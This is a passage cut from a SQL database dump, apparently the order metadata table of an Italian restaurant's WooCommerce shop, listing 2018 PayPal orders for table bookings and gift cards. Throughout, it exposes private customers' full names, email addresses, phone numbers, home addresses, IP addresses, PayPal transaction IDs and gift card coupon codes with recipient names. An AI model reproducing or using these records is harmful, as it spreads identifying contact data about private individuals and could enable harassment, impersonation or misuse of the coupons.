adulti?','4'),(13040,681,'Numero bambini fino a 6 anni','0'),(13041,681,'Numero ragazzi fino a 13 anni','0'),(13042,681,'Files attached','[]'),(13043,681,'Payer PayPal address','santaharizaj@gmail.com'),(13044,681,'Payer first name','Santa'),(13045,681,'Payer last name','Harizaj'),(13046,681,'Payment type','instant'),(13047,681,'_paypal_status','completed'),(13048,681,'_download_permissions_granted','yes'),(13049,681,'_recorded_sales','yes'),(13050,681,'_recorded_coupon_usage_counts','yes'),(13051,681,'_order_stock_reduced','yes'),(13052,681,'PayPal Transaction Fee','3.75'),(13053,682,'_order_key','wc_order_5abea9d57c53c'),(13054,682,'_customer_user','0'),(13055,682,'_payment_method','paypal'),(13056,682,'_payment_method_title','PayPal'),(13057,682,'_transaction_id',''),(13058,682,'_customer_ip_address','146.241.18.124'),(13059,682,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(13060,682,'_created_via','checkout'),(13061,682,'_date_completed',''),(13062,682,'_completed_date',''),(13063,682,'_date_paid',''),(13064,682,'_paid_date',''),(13065,682,'_cart_hash','e08d4cdd9b075a43bf34520c10089145'),(13066,682,'_billing_first_name','Andrea'),(13067,682,'_billing_last_name','Parolini'),(13068,682,'_billing_company',''),(13069,682,'_billing_address_1','Via Garibaldi 72'),(13070,682,'_billing_address_2',''),(13071,682,'_billing_city','Castelnuovo del Garda'),(13072,682,'_billing_state',''),(13073,682,'_billing_postcode',''),(13074,682,'_billing_country',''),(13075,682,'_billing_email','Andrea@parolinispa.it'),(13076,682,'_billing_phone','3481511372'),(13077,682,'_shipping_first_name',''),(13078,682,'_shipping_last_name',''),(13079,682,'_shipping_company',''),(13080,682,'_shipping_address_1',''),(13081,682,'_shipping_address_2',''),(13082,682,'_shipping_city',''),(13083,682,'_shipping_state',''),(13084,682,'_shipping_postcode',''),(13085,682,'_shipping_country',''),(13086,682,'_order_currency','EUR'),(13087,682,'_cart_discount','0'),(13088,682,'_cart_discount_tax','0'),(13089,682,'_order_shipping','0.00'),(13090,682,'_order_shipping_tax','0'),(13091,682,'_order_tax','0'),(13092,682,'_order_total','75.00'),(13093,682,'_order_version','3.3.4'),(13094,682,'_prices_include_tax','no'),(13095,682,'_billing_address_index','Andrea Parolini  Via Garibaldi 72  Castelnuovo del Garda    Andrea@parolinispa.it 3481511372'),(13096,682,'_shipping_address_index','        '),(13097,682,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(13098,682,'Numero bambini fino a 6 anni','1'),(13099,682,'Numero ragazzi fino a 13 anni','0'),(13100,682,'Files attached','[]'),(13101,683,'_order_key','wc_order_5abeab212a625'),(13102,683,'_customer_user','0'),(13103,683,'_payment_method','paypal'),(13104,683,'_payment_method_title','PayPal'),(13105,683,'_transaction_id',''),(13106,683,'_customer_ip_address','146.241.18.124'),(13107,683,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(13108,683,'_created_via','checkout'),(13109,683,'_date_completed',''),(13110,683,'_completed_date',''),(13111,683,'_date_paid',''),(13112,683,'_paid_date',''),(13113,683,'_cart_hash','e08d4cdd9b075a43bf34520c10089145'),(13114,683,'_billing_first_name','Andrea'),(13115,683,'_billing_last_name','Parolini'),(13116,683,'_billing_company',''),(13117,683,'_billing_address_1','Via Garibaldi 72'),(13118,683,'_billing_address_2',''),(13119,683,'_billing_city','Castelnuovo del Garda'),(13120,683,'_billing_state',''),(13121,683,'_billing_postcode',''),(13122,683,'_billing_country',''),(13123,683,'_billing_email','Andrea@parolinispa.it'),(13124,683,'_billing_phone','3481511372'),(13125,683,'_shipping_first_name',''),(13126,683,'_shipping_last_name',''),(13127,683,'_shipping_company',''),(13128,683,'_shipping_address_1',''),(13129,683,'_shipping_address_2',''),(13130,683,'_shipping_city',''),(13131,683,'_shipping_state',''),(13132,683,'_shipping_postcode',''),(13133,683,'_shipping_country',''),(13134,683,'_order_currency','EUR'),(13135,683,'_cart_discount','0'),(13136,683,'_cart_discount_tax','0'),(13137,683,'_order_shipping','0.00'),(13138,683,'_order_shipping_tax','0'),(13139,683,'_order_tax','0'),(13140,683,'_order_total','75.00'),(13141,683,'_order_version','3.3.4'),(13142,683,'_prices_include_tax','no'),(13143,683,'_billing_address_index','Andrea Parolini  Via Garibaldi 72  Castelnuovo del Garda    Andrea@parolinispa.it 3481511372'),(13144,683,'_shipping_address_index','        '),(13145,683,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(13146,683,'Numero bambini fino a 6 anni','1'),(13147,683,'Numero ragazzi fino a 13 anni','0'),(13148,683,'Files attached','[]'),(13149,684,'_order_key','wc_order_5abf59b236aec'),(13150,684,'_customer_user','0'),(13151,684,'_payment_method','paypal'),(13152,684,'_payment_method_title','PayPal'),(13153,684,'_transaction_id','23410498EA9450133'),(13154,684,'_customer_ip_address','79.58.177.75'),(13155,684,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(13156,684,'_created_via','checkout'),(13157,684,'_date_completed',''),(13158,684,'_completed_date',''),(13159,684,'_date_paid','1522489897'),(13160,684,'_paid_date','2018-03-31 11:51:37'),(13161,684,'_cart_hash','e08d4cdd9b075a43bf34520c10089145'),(13162,684,'_billing_first_name','andrea'),(13163,684,'_billing_last_name','parolini'),(13164,684,'_billing_company',''),(13165,684,'_billing_address_1','via garibaldi 72'),(13166,684,'_billing_address_2',''),(13167,684,'_billing_city','castelnuovo del garda'),(13168,684,'_billing_state',''),(13169,684,'_billing_postcode',''),(13170,684,'_billing_country',''),(13171,684,'_billing_email','andrea@parolinispa.it'),(13172,684,'_billing_phone','3481511372'),(13173,684,'_shipping_first_name',''),(13174,684,'_shipping_last_name',''),(13175,684,'_shipping_company',''),(13176,684,'_shipping_address_1',''),(13177,684,'_shipping_address_2',''),(13178,684,'_shipping_city',''),(13179,684,'_shipping_state',''),(13180,684,'_shipping_postcode',''),(13181,684,'_shipping_country',''),(13182,684,'_order_currency','EUR'),(13183,684,'_cart_discount','0'),(13184,684,'_cart_discount_tax','0'),(13185,684,'_order_shipping','0.00'),(13186,684,'_order_shipping_tax','0'),(13187,684,'_order_tax','0'),(13188,684,'_order_total','75.00'),(13189,684,'_order_version','3.3.4'),(13190,684,'_prices_include_tax','no'),(13191,684,'_billing_address_index','andrea parolini  via garibaldi 72  castelnuovo del garda    andrea@parolinispa.it 3481511372'),(13192,684,'_shipping_address_index','        '),(13193,684,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(13194,684,'Numero bambini fino a 6 anni','1'),(13195,684,'Numero ragazzi fino a 13 anni','0'),(13196,684,'Files attached','[]'),(13197,684,'Payer PayPal address','andrea@parolinispa.it'),(13198,684,'Payer first name','andrea'),(13199,684,'Payer last name','parolini'),(13200,684,'Payment type','instant'),(13201,684,'_paypal_status','completed'),(13202,684,'_download_permissions_granted','yes'),(13203,684,'_recorded_sales','yes'),(13204,684,'_recorded_coupon_usage_counts','yes'),(13205,684,'_order_stock_reduced','yes'),(13206,684,'PayPal Transaction Fee','2.90'),(13207,686,'_order_key','wc_order_5accc87fee2d2'),(13208,686,'_customer_user','0'),(13209,686,'_payment_method','paypal'),(13210,686,'_payment_method_title','PayPal'),(13211,686,'_transaction_id','5BN15448337394453'),(13212,686,'_customer_ip_address','93.44.81.65'),(13213,686,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(13214,686,'_created_via','checkout'),(13215,686,'_date_completed',''),(13216,686,'_completed_date',''),(13217,686,'_date_paid','1523370159'),(13218,686,'_paid_date','2018-04-10 16:22:39'),(13219,686,'_cart_hash','d008133af6741c56c426f264bb36b475'),(13220,686,'_billing_first_name','Rossella'),(13221,686,'_billing_last_name','Aiardo'),(13222,686,'_billing_company',''),(13223,686,'_billing_address_1','via Giuseppe Ceri 44'),(13224,686,'_billing_address_2',''),(13225,686,'_billing_city','Bologna'),(13226,686,'_billing_state',''),(13227,686,'_billing_postcode',''),(13228,686,'_billing_country',''),(13229,686,'_billing_email','aiardorossella@hotmail.it'),(13230,686,'_billing_phone','3358211397'),(13231,686,'_shipping_first_name',''),(13232,686,'_shipping_last_name',''),(13233,686,'_shipping_company',''),(13234,686,'_shipping_address_1',''),(13235,686,'_shipping_address_2',''),(13236,686,'_shipping_city',''),(13237,686,'_shipping_state',''),(13238,686,'_shipping_postcode',''),(13239,686,'_shipping_country',''),(13240,686,'_order_currency','EUR'),(13241,686,'_cart_discount','0'),(13242,686,'_cart_discount_tax','0'),(13243,686,'_order_shipping','0.00'),(13244,686,'_order_shipping_tax','0'),(13245,686,'_order_tax','0'),(13246,686,'_order_total','120.00'),(13247,686,'_order_version','3.3.4'),(13248,686,'_prices_include_tax','no'),(13249,686,'_billing_address_index','Rossella Aiardo  via Giuseppe Ceri 44  Bologna    aiardorossella@hotmail.it 3358211397'),(13250,686,'_shipping_address_index','        '),(13251,686,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13252,686,'Numero bambini fino a 6 anni','0'),(13253,686,'Numero ragazzi fino a 13 anni','0'),(13254,686,'Files attached','[]'),(13255,686,'Payer PayPal address','Bambolina17@hotmail.it'),(13256,686,'Payer first name','Rossella'),(13257,686,'Payer last name','Aiardo'),(13258,686,'Payment type','instant'),(13259,686,'_paypal_status','completed'),(13260,686,'_download_permissions_granted','yes'),(13261,686,'_recorded_sales','yes'),(13262,686,'_recorded_coupon_usage_counts','yes'),(13263,687,'discount_type','fixed_cart'),(13264,687,'coupon_amount','120'),(13265,687,'individual_use','no'),(13266,687,'usage_limit','1'),(13267,687,'expiry_date','2018-10-07'),(13268,687,'apply_before_tax','no'),(13269,687,'free_shipping','no'),(13270,687,'minimum_amount',''),(13271,687,'maximum_amount',''),(13272,687,'exclude_sale_items','no'),(13273,687,'exclude_product_ids',''),(13274,687,'exclude_product_categories',''),(13275,687,'mwb_wgm_giftcard_coupon','686'),(13276,687,'mwb_wgm_giftcard_coupon_unique','online'),(13277,687,'mwb_wgm_giftcard_coupon_product_id','472'),(13278,687,'mwb_wgm_giftcard_coupon_mail_to','Sole'),(13279,686,'686#232','solymarcouponRFS3Y'),(13280,686,'mwb_wgm_order_giftcard','send'),(13281,686,'_order_stock_reduced','yes'),(13282,686,'PayPal Transaction Fee','4.43'),(13283,688,'_order_key','wc_order_5ada00ee3d00d'),(13284,688,'_customer_user','0'),(13285,688,'_payment_method','paypal'),(13286,688,'_payment_method_title','PayPal'),(13287,688,'_transaction_id','6TL59307A15098521'),(13288,688,'_customer_ip_address','151.65.6.38'),(13289,688,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_9_5) applewebkit/601.7.8 (khtml, like gecko) version/9.1.3 safari/537.86.7'),(13290,688,'_created_via','checkout'),(13291,688,'_date_completed','1524236578'),(13292,688,'_completed_date','2018-04-20 17:02:58'),(13293,688,'_date_paid','1524236562'),(13294,688,'_paid_date','2018-04-20 17:02:42'),(13295,688,'_cart_hash','7b0293ac4dd958b6941b3c1cafa1c291'),(13296,688,'_billing_first_name','Alessia'),(13297,688,'_billing_last_name','Colognesi'),(13298,688,'_billing_company',''),(13299,688,'_billing_address_1','Via Bellalancia 8'),(13300,688,'_billing_address_2',''),(13301,688,'_billing_city','Mantova'),(13302,688,'_billing_state',''),(13303,688,'_billing_postcode',''),(13304,688,'_billing_country',''),(13305,688,'_billing_email','alessiacolognesi@ilgiardinodeiviandanti.com'),(13306,688,'_billing_phone','347 3163731'),(13307,688,'_shipping_first_name',''),(13308,688,'_shipping_last_name',''),(13309,688,'_shipping_company',''),(13310,688,'_shipping_address_1',''),(13311,688,'_shipping_address_2',''),(13312,688,'_shipping_city',''),(13313,688,'_shipping_state',''),(13314,688,'_shipping_postcode',''),(13315,688,'_shipping_country',''),(13316,688,'_order_currency','EUR'),(13317,688,'_cart_discount','0'),(13318,688,'_cart_discount_tax','0'),(13319,688,'_order_shipping','0.00'),(13320,688,'_order_shipping_tax','0'),(13321,688,'_order_tax','0'),(13322,688,'_order_total','50.00'),(13323,688,'_order_version','3.3.4'),(13324,688,'_prices_include_tax','no'),(13325,688,'_billing_address_index','Alessia Colognesi  Via Bellalancia 8  Mantova    alessiacolognesi@ilgiardinodeiviandanti.com 347 3163731'),(13326,688,'_shipping_address_index','        '),(13327,688,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13328,688,'Numero bambini fino a 6 anni','1'),(13329,688,'Numero ragazzi fino a 13 anni','1'),(13330,688,'Files attached','[]'),(13331,688,'Payer PayPal address','alessiacolognesi@ilgiardinodeiviandanti.com'),(13332,688,'Payer first name','Alessia'),(13333,688,'Payer last name','Colognesi'),(13334,688,'Payment type','instant'),(13335,688,'_paypal_status','completed'),(13336,688,'_download_permissions_granted','yes'),(13337,688,'_recorded_sales','yes'),(13338,688,'_recorded_coupon_usage_counts','yes'),(13339,689,'discount_type','fixed_cart'),(13340,689,'coupon_amount','50'),(13341,689,'individual_use','no'),(13342,689,'usage_limit','1'),(13343,689,'expiry_date','2018-10-17'),(13344,689,'apply_before_tax','no'),(13345,689,'free_shipping','no'),(13346,689,'minimum_amount',''),(13347,689,'maximum_amount',''),(13348,689,'exclude_sale_items','no'),(13349,689,'exclude_product_ids',''),(13350,689,'exclude_product_categories',''),(13351,689,'mwb_wgm_giftcard_coupon','688'),(13352,689,'mwb_wgm_giftcard_coupon_unique','online'),(13353,689,'mwb_wgm_giftcard_coupon_product_id','548'),(13354,689,'mwb_wgm_giftcard_coupon_mail_to','Tommaso Tonelli'),(13355,688,'688#233','solymarcouponFC3OP'),(13356,688,'mwb_wgm_order_giftcard','send'),(13357,688,'_order_stock_reduced','yes'),(13358,688,'PayPal Transaction Fee','2.05'),(13359,690,'_order_key','wc_order_5b03b87ab57ec'),(13360,690,'_customer_user','32'),(13361,690,'_payment_method','paypal'),(13362,690,'_payment_method_title','PayPal'),(13363,690,'_transaction_id','35U52264S25288118'),(13364,690,'_customer_ip_address','37.117.114.145'),(13365,690,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_10_5) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.162 safari/537.36'),(13366,690,'_created_via','checkout'),(13367,690,'_date_completed',''),(13368,690,'_completed_date',''),(13369,690,'_date_paid','1526970540'),(13370,690,'_paid_date','2018-05-22 08:29:00'),(13371,690,'_cart_hash','d6d6e9f1116d78bda39ac89a65b14cba'),(13372,690,'_billing_first_name','Martina'),(13373,690,'_billing_last_name','Melucci'),(13374,690,'_billing_company',''),(13375,690,'_billing_address_1','Via Antonio Bondi 61/4'),(13376,690,'_billing_address_2',''),(13377,690,'_billing_city','Bologna'),(13378,690,'_billing_state',''),(13379,690,'_billing_postcode',''),(13380,690,'_billing_country',''),(13381,690,'_billing_email','marty.mel86@gmail.com'),(13382,690,'_billing_phone','3204961791'),(13383,690,'_shipping_first_name',''),(13384,690,'_shipping_last_name',''),(13385,690,'_shipping_company',''),(13386,690,'_shipping_address_1',''),(13387,690,'_shipping_address_2',''),(13388,690,'_shipping_city',''),(13389,690,'_shipping_state',''),(13390,690,'_shipping_postcode',''),(13391,690,'_shipping_country',''),(13392,690,'_order_currency','EUR'),(13393,690,'_cart_discount','0'),(13394,690,'_cart_discount_tax','0'),(13395,690,'_order_shipping','0.00'),(13396,690,'_order_shipping_tax','0'),(13397,690,'_order_tax','0'),(13398,690,'_order_total','115.00'),(13399,690,'_order_version','3.3.4'),(13400,690,'_prices_include_tax','no'),(13401,690,'_billing_address_index','Martina Melucci  Via Antonio Bondi 61/4  Bologna    marty.mel86@gmail.com 3204961791'),(13402,690,'_shipping_address_index','        '),(13403,690,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13404,690,'Numero bambini fino a 6 anni','0'),(13405,690,'Numero ragazzi fino a 13 anni','0'),(13406,690,'Files attached','[]'),(13407,690,'Payer PayPal address','marty.mel86@gmail.com'),(13408,690,'Payer first name','Martina'),(13409,690,'Payer last name','Melucci'),(13410,690,'Payment type','instant'),(13411,690,'_paypal_status','completed'),(13412,690,'_download_permissions_granted','yes'),(13413,690,'_recorded_sales','yes'),(13414,690,'_recorded_coupon_usage_counts','yes'),(13415,691,'discount_type','fixed_cart'),(13416,691,'coupon_amount','115'),(13417,691,'individual_use','no'),(13418,691,'usage_limit','1'),(13419,691,'expiry_date','2018-11-18'),(13420,691,'apply_before_tax','no'),(13421,691,'free_shipping','no'),(13422,691,'minimum_amount',''),(13423,691,'maximum_amount',''),(13424,691,'exclude_sale_items','no'),(13425,691,'exclude_product_ids',''),(13426,691,'exclude_product_categories',''),(13427,691,'mwb_wgm_giftcard_coupon','690'),(13428,691,'mwb_wgm_giftcard_coupon_unique','online'),(13429,691,'mwb_wgm_giftcard_coupon_product_id','475'),(13430,691,'mwb_wgm_giftcard_coupon_mail_to','Villa Gladys Maria'),(13431,690,'690#234','solymarcouponN5F5X'),(13432,690,'mwb_wgm_order_giftcard','send'),(13433,690,'_order_stock_reduced','yes'),(13434,690,'PayPal Transaction Fee','4.26'),(13487,693,'_order_key','wc_order_5b0ec015c79fc'),(13488,693,'_customer_user','0'),(13489,693,'_payment_method','paypal'),(13490,693,'_payment_method_title','PayPal'),(13491,693,'_transaction_id','72473824WX8957135'),(13492,693,'_customer_ip_address','80.117.76.192'),(13493,693,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/66.0.3359.181 safari/537.36'),(13494,693,'_created_via','checkout'),(13495,693,'_date_completed',''),(13496,693,'_completed_date',''),(13497,693,'_date_paid','1527693586'),(13498,693,'_paid_date','2018-05-30 17:19:46'),(13499,693,'_cart_hash','1156ab56c1845b04482aa1c3cd54db9c'),(13500,693,'_billing_first_name','Fabio'),(13501,693,'_billing_last_name','Guidazzi'),(13502,693,'_billing_company',''),(13503,693,'_billing_address_1',''),(13504,693,'_billing_address_2',''),(13505,693,'_billing_city',''),(13506,693,'_billing_state',''),(13507,693,'_billing_postcode',''),(13508,693,'_billing_country',''),(13509,693,'_billing_email','guidabio66@gmail.com'),(13510,693,'_billing_phone','3332289451'),(13511,693,'_shipping_first_name',''),(13512,693,'_shipping_last_name',''),(13513,693,'_shipping_company',''),(13514,693,'_shipping_address_1',''),(13515,693,'_shipping_address_2',''),(13516,693,'_shipping_city',''),(13517,693,'_shipping_state',''),(13518,693,'_shipping_postcode',''),(13519,693,'_shipping_country',''),(13520,693,'_order_currency','EUR'),(13521,693,'_cart_discount','0'),(13522,693,'_cart_discount_tax','0'),(13523,693,'_order_shipping','0.00'),(13524,693,'_order_shipping_tax','0'),(13525,693,'_order_tax','0'),(13526,693,'_order_total','115.00'),(13527,693,'_order_version','3.4.0'),(13528,693,'_prices_include_tax','no'),(13529,693,'_billing_address_index','Fabio Guidazzi        guidabio66@gmail.com 3332289451'),(13530,693,'_shipping_address_index','        '),(13531,693,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13532,693,'Numero bambini fino a 6 anni','0'),(13533,693,'Numero ragazzi fino a 13 anni','0'),(13534,693,'Files attached','[]'),(13535,693,'Payment type','instant'),(13536,693,'_paypal_status','completed'),(13537,693,'_download_permissions_granted','yes'),(13538,693,'_recorded_sales','yes'),(13539,693,'_recorded_coupon_usage_counts','yes'),(13540,694,'discount_type','fixed_cart'),(13541,694,'coupon_amount','115'),(13542,694,'individual_use','no'),(13543,694,'usage_limit','1'),(13544,694,'expiry_date','2018-11-26'),(13545,694,'apply_before_tax','no'),(13546,694,'free_shipping','no'),(13547,694,'minimum_amount',''),(13548,694,'maximum_amount',''),(13549,694,'exclude_sale_items','no'),(13550,694,'exclude_product_ids',''),(13551,694,'exclude_product_categories',''),(13552,694,'mwb_wgm_giftcard_coupon','693'),(13553,694,'mwb_wgm_giftcard_coupon_unique','online'),(13554,694,'mwb_wgm_giftcard_coupon_product_id','475'),(13555,694,'mwb_wgm_giftcard_coupon_mail_to','Renato Bernardini'),(13556,693,'693#235','solymarcouponBALWY'),(13557,693,'mwb_wgm_order_giftcard','send'),(13558,693,'_order_stock_reduced','yes'),(13559,693,'PayPal Transaction Fee','4.26'),(13561,695,'_order_key','wc_order_5b41fa6412022'),(13562,695,'_customer_user','0'),(13563,695,'_payment_method','paypal'),(13564,695,'_payment_method_title','PayPal'),(13565,695,'_transaction_id','4WV14118AF3728813'),(13566,695,'_customer_ip_address','95.234.219.59'),(13567,695,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.87 safari/537.36'),(13568,695,'_created_via','checkout'),(13569,695,'_date_completed','1531050732'),(13570,695,'_completed_date','2018-07-08 13:52:12'),(13571,695,'_date_paid','1531050697'),(13572,695,'_paid_date','2018-07-08 13:51:37'),(13573,695,'_cart_hash','996316833a6dd9d33c34a9e3039094ed'),(13574,695,'_billing_first_name','Valentina'),(13575,695,'_billing_last_name','Tardini'),(13576,695,'_billing_company',''),(13577,695,'_billing_address_1',''),(13578,695,'_billing_address_2',''),(13579,695,'_billing_city',''),(13580,695,'_billing_state',''),(13581,695,'_billing_postcode',''),(13582,695,'_billing_country',''),(13583,695,'_billing_email','vali.laura@hotmail.it'),(13584,695,'_billing_phone','3470664575'),(13585,695,'_shipping_first_name',''),(13586,695,'_shipping_last_name',''),(13587,695,'_shipping_company',''),(13588,695,'_shipping_address_1',''),(13589,695,'_shipping_address_2',''),(13590,695,'_shipping_city',''),(13591,695,'_shipping_state',''),(13592,695,'_shipping_postcode',''),(13593,695,'_shipping_country',''),(13594,695,'_order_currency','EUR'),(13595,695,'_cart_discount','0'),(13596,695,'_cart_discount_tax','0'),(13597,695,'_order_shipping','0.00'),(13598,695,'_order_shipping_tax','0'),(13599,695,'_order_tax','0'),(13600,695,'_order_total','120.00'),(13601,695,'_order_version','3.4.0'),(13602,695,'_prices_include_tax','no'),(13603,695,'_billing_address_index','Valentina Tardini        vali.laura@hotmail.it 3470664575'),(13604,695,'_shipping_address_index','        '),(13605,695,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13606,695,'Numero bambini fino a 6 anni','0'),(13607,695,'Numero ragazzi fino a 13 anni','0'),(13608,695,'Files attached','[]'),(13609,695,'Payment type','instant'),(13610,695,'_paypal_status','completed'),(13611,695,'_download_permissions_granted','yes'),(13612,695,'_recorded_sales','yes'),(13613,695,'_recorded_coupon_usage_counts','yes'),(13614,696,'discount_type','fixed_cart'),(13615,696,'coupon_amount','120'),(13616,696,'individual_use','no'),(13617,696,'usage_limit','1'),(13618,696,'expiry_date','2019-01-04'),(13619,696,'apply_before_tax','no'),(13620,696,'free_shipping','no'),(13621,696,'minimum_amount',''),(13622,696,'maximum_amount',''),(13623,696,'exclude_sale_items','no'),(13624,696,'exclude_product_ids',''),(13625,696,'exclude_product_categories',''),(13626,696,'mwb_wgm_giftcard_coupon','695'),(13627,696,'mwb_wgm_giftcard_coupon_unique','online'),(13628,696,'mwb_wgm_giftcard_coupon_product_id','472'),(13629,696,'mwb_wgm_giftcard_coupon_mail_to','Guerrino & Mariella'),(13630,695,'695#236','solymarcoupon8ND67'),(13631,695,'mwb_wgm_order_giftcard','send'),(13632,695,'_order_stock_reduced','yes'),(13633,695,'PayPal Transaction Fee','4.43'),(13634,697,'_order_key','wc_order_5b49f41557450'),(13635,697,'_customer_user','0'),(13636,697,'_payment_method','paypal'),(13637,697,'_payment_method_title','PayPal'),(13638,697,'_transaction_id','5V29451927528502C'),(13639,697,'_customer_ip_address','151.57.74.94'),(13640,697,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; eva-l09 build/huaweieva-l09) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.87 mobile safari/537.36'),(13641,697,'_created_via','checkout'),(13642,697,'_date_completed','1531573382'),(13643,697,'_completed_date','2018-07-14 15:03:02'),(13644,697,'_date_paid','1531573372'),(13645,697,'_paid_date','2018-07-14 15:02:52'),(13646,697,'_cart_hash','8923cce75b85f3baa4518459ad8709e6'),(13647,697,'_billing_first_name','Emanuele'),(13648,697,'_billing_last_name','Ioni'),(13649,697,'_billing_company',''),(13650,697,'_billing_address_1',''),(13651,697,'_billing_address_2',''),(13652,697,'_billing_city',''),(13653,697,'_billing_state',''),(13654,697,'_billing_postcode',''),(13655,697,'_billing_country',''),(13656,697,'_billing_email','emanuele.ioni@bernardisrl.it'),(13657,697,'_billing_phone','3478081119'),(13658,697,'_shipping_first_name',''),(13659,697,'_shipping_last_name',''),(13660,697,'_shipping_company',''),(13661,697,'_shipping_address_1',''),(13662,697,'_shipping_address_2',''),(13663,697,'_shipping_city',''),(13664,697,'_shipping_state',''),(13665,697,'_shipping_postcode',''),(13666,697,'_shipping_country',''),(13667,697,'_order_currency','EUR'),(13668,697,'_cart_discount','0'),(13669,697,'_cart_discount_tax','0'),(13670,697,'_order_shipping','0.00'),(13671,697,'_order_shipping_tax','0'),(13672,697,'_order_tax','0'),(13673,697,'_order_total','100.00'),(13674,697,'_order_version','3.4.0'),(13675,697,'_prices_include_tax','no'),(13676,697,'_billing_address_index','Emanuele Ioni        emanuele.ioni@bernardisrl.it 3478081119'),(13677,697,'_shipping_address_index','        '),(13678,697,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13679,697,'Numero bambini fino a 6 anni','0'),(13680,697,'Numero ragazzi fino a 13 anni','0'),(13681,697,'Files attached','[]'),(13682,697,'Payment type','instant'),(13683,697,'_paypal_status','completed'),(13684,697,'_download_permissions_granted','yes'),(13685,697,'_recorded_sales','yes'),(13686,697,'_recorded_coupon_usage_counts','yes'),(13687,698,'discount_type','fixed_cart'),(13688,698,'coupon_amount','100'),(13689,698,'individual_use','no'),(13690,698,'usage_limit','1'),(13691,698,'expiry_date','2019-01-10'),(13692,698,'apply_before_tax','no'),(13693,698,'free_shipping','no'),(13694,698,'minimum_amount',''),(13695,698,'maximum_amount',''),(13696,698,'exclude_sale_items','no'),(13697,698,'exclude_product_ids',''),(13698,698,'exclude_product_categories',''),(13699,698,'mwb_wgm_giftcard_coupon','697'),(13700,698,'mwb_wgm_giftcard_coupon_unique','online'),(13701,698,'mwb_wgm_giftcard_coupon_product_id','548'),(13702,698,'mwb_wgm_giftcard_coupon_mail_to','manmilly@libero.it'),(13703,697,'697#237','solymarcouponPXAWI'),(13704,697,'mwb_wgm_order_giftcard','send'),(13705,697,'_order_stock_reduced','yes'),(13706,697,'PayPal Transaction Fee','3.75'),(13707,699,'_order_key','wc_order_5b4a11467d7f3'),(13708,699,'_customer_user','33'),(13709,699,'_payment_method','paypal'),(13710,699,'_payment_method_title','PayPal'),(13711,699,'_transaction_id','6P123981T0717481R'),(13712,699,'_customer_ip_address','93.41.36.38'),(13713,699,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_9_5) applewebkit/601.6.17 (khtml, like gecko) version/9.1.1 safari/537.86.6'),(13714,699,'_created_via','checkout'),(13715,699,'_date_completed','1531580998'),(13716,699,'_completed_date','2018-07-14 17:09:58'),(13717,699,'_date_paid','1531580984'),(13718,699,'_paid_date','2018-07-14 17:09:44'),(13719,699,'_cart_hash','5a760bc85047bca74ea6e9295911fc7f'),(13720,699,'_billing_first_name','ROBERTO'),(13721,699,'_billing_last_name','AULICO'),(13722,699,'_billing_company',''),(13723,699,'_billing_address_1','via luca della robbia 10/1'),(13724,699,'_billing_address_2',''),(13725,699,'_billing_city','pesaro'),(13726,699,'_billing_state',''),(13727,699,'_billing_postcode',''),(13728,699,'_billing_country',''),(13729,699,'_billing_email','elisa_semprucci@yahoo.it'),(13730,699,'_billing_phone','3493282505'),(13731,699,'_shipping_first_name',''),(13732,699,'_shipping_last_name',''),(13733,699,'_shipping_company',''),(13734,699,'_shipping_address_1',''),(13735,699,'_shipping_address_2',''),(13736,699,'_shipping_city',''),(13737,699,'_shipping_state',''),(13738,699,'_shipping_postcode',''),(13739,699,'_shipping_country',''),(13740,699,'_order_currency','EUR'),(13741,699,'_cart_discount','0'),(13742,699,'_cart_discount_tax','0'),(13743,699,'_order_shipping','0.00'),(13744,699,'_order_shipping_tax','0'),(13745,699,'_order_tax','0'),(13746,699,'_order_total','98.00'),(13747,699,'_order_version','3.4.0'),(13748,699,'_prices_include_tax','no'),(13749,699,'_billing_address_index','ROBERTO AULICO  via luca della robbia 10/1  pesaro    elisa_semprucci@yahoo.it 3493282505'),(13750,699,'_shipping_address_index','        '),(13751,699,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13752,699,'Numero bambini fino a 6 anni','0'),(13753,699,'Numero ragazzi fino a 13 anni','0'),(13754,699,'Files attached','[]'),(13755,699,'Payment type','instant'),(13756,699,'_paypal_status','completed'),(13757,699,'_download_permissions_granted','yes'),(13758,699,'_recorded_sales','yes'),(13759,699,'_recorded_coupon_usage_counts','yes'),(13760,700,'discount_type','fixed_cart'),(13761,700,'coupon_amount','98'),(13762,700,'individual_use','no'),(13763,700,'usage_limit','1'),(13764,700,'expiry_date','2019-01-10'),(13765,700,'apply_before_tax','no'),(13766,700,'free_shipping','no'),(13767,700,'minimum_amount',''),(13768,700,'maximum_amount',''),(13769,700,'exclude_sale_items','no'),(13770,700,'exclude_product_ids',''),(13771,700,'exclude_product_categories',''),(13772,700,'mwb_wgm_giftcard_coupon','699'),(13773,700,'mwb_wgm_giftcard_coupon_unique','online'),(13774,700,'mwb_wgm_giftcard_coupon_product_id','435'),(13775,700,'mwb_wgm_giftcard_coupon_mail_to','ROBERTO 